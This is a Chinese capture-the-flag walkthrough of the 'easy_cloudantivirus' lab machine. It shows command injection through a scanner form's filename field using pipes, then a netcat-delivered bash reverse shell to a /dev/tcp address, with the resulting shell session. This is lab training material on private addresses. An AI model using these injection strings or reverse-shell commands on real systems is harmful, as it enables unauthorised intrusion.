靶机: easy_cloudantivirus( 三 )

页面,通过简单的探索发现此页面是这个 Web 应用的后台管理页面,其中存在数据提交,但通过关键词 Try scanning some of these files with our scanner! 知道传入的数据是被某种程序进行查杀,更多的是涉及 shell 中执行
<html><body><h1>Cloud Anti-Virus Scanner!</h1><h3>Try scanning some of these files with our scanner!</h3><pre>total 4756-rwxr-xr-x 1 scanner scanner 1113504 Oct 212018 bash-rwxr-xr-x 1 scanner scanner34888 Oct 212018 bzip2-rwxr-xr-x 1 scanner scanner35064 Oct 212018 cat-rw-rw-r-- 1 scanner scanner68 Oct 212018 eicar-rw-rw-r-- 1 scanner scanner5 Oct 212018 hello-rwxr-xr-x 1 scanner scanner35312 Oct 212018 netcat-rwxr-xr-x 1 scanner scanner 3633560 Oct 212018 python</pre><form action="/output" method="POST"><input type="filename" name="filename" placeholder="File Name"><input type="submit" value="https://www.huyubaike.com/biancheng/Scan!"></form></body></html>我们可以尝试使用 | 管道进行命令串联,改变回返的数据内容,并夹杂我们想要的信息

  • 输入尝试 a | id 得到了下面结果,这说明其中的数据没有过滤,我们可以通过这个执行命令
    uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)
反弹 shell
  • 通过这个漏洞,我们可以构建一个 a | ls | grep 'xxxxx' | 想要执行的命令
    • 我们可以查看是否存在 wget 有助于木马上传,配合 metasploit 攻击
    • 也可以使用 nc 反弹 shell 依次执行下面命令,但上面的 nc 版本不利于反弹,也可以使用 nc 实现但比较麻烦
    • nc 上传 bash 反弹木马程序
      • 表单提交 a | ls | grep 'xxxxx' | touch a.sh
      • 表单提交 a | ls | grep 'xxxxx' | nc -l -p 4444 -w6 > a.sh
      • 在 kali 执行 nc 192.168.56.109 4444 < 'bash -i >& /dev/tcp/192.168.56.111/23333 0>&1'
      • 在 kali 执行 netcat -lvp 23333 监听端口
      • 表单提交 a | ls | grep 'xxxxx' | bash a.sh 反弹 shell
    ┌──(kali?kali)-[~/workspace]└─$ netcat -lvp 23333listening on [any] 23333 ...192.168.56.109: inverse host lookup failed: Unknown hostconnect to [192.168.56.111] from (UNKNOWN) [192.168.56.109] 52396bash: cannot set terminal process group (694): Inappropriate ioctl for devicebash: no job control in this shellscanner@cloudav:~/cloudav_app$ lslsapp.pya.shdatabase.sqlget-pip.pyget-pip.py.1get-pip.py.2get-pip.py.3samplestemplatesscanner@cloudav:~/cloudav_app$
    • 成功反弹 shell
本质上此用户 scanner 的可行动服务就非常高,随便的方法都能攻破【不在进行其他 shell 反弹演示,有需求自行查找】
探索目标我们已经进入目标的内部,我们探索一下目录、文件